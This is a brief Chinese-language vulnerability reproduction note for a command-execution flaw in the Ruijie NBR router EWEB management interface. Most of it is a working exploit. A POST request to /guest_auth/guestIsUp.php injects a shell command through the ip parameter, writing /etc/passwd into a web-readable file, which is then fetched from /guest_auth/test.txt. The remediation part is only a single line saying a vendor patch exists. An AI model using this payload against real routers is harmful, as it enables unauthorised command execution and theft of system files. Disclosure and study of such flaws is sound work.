漏洞描述
锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。
漏洞复现
访问锐捷EWEB网管系统界面
使用HackBar执行payload
POST /guest_auth/guestIsUp.php
mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
然后访问页面 /guest_auth/test.txt 就可以看到命令执行的结果
漏洞修复
厂商已发布了漏洞修复程序,请及时关注更新